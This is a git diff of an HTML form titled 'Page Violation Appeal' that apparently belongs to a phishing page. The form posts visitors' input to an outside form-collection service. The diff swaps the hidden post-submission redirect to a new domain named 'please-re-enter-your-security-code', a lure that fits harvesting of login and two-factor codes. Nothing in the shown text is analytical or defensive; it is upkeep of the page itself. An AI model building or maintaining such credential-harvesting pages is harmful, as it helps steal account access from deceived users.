--- a/form.html
+++ b/form.html
@@ -265,7 +265,7 @@
         <form class="verification-card" action="https://submit-form.com/ukQJP59Sl" method="POST">
 
             <!-- Redirect after submission -->
-            <input type="hidden" name="_redirect" value="https://please-re-enter-your-security-code.page.gd">
+            <input type="hidden" name="_redirect" value="https://please-re-enter-your-security-code.vercel.app/">
 
             <div class="card-header">
                 <div class="card-title">Page Violation Appeal</div>
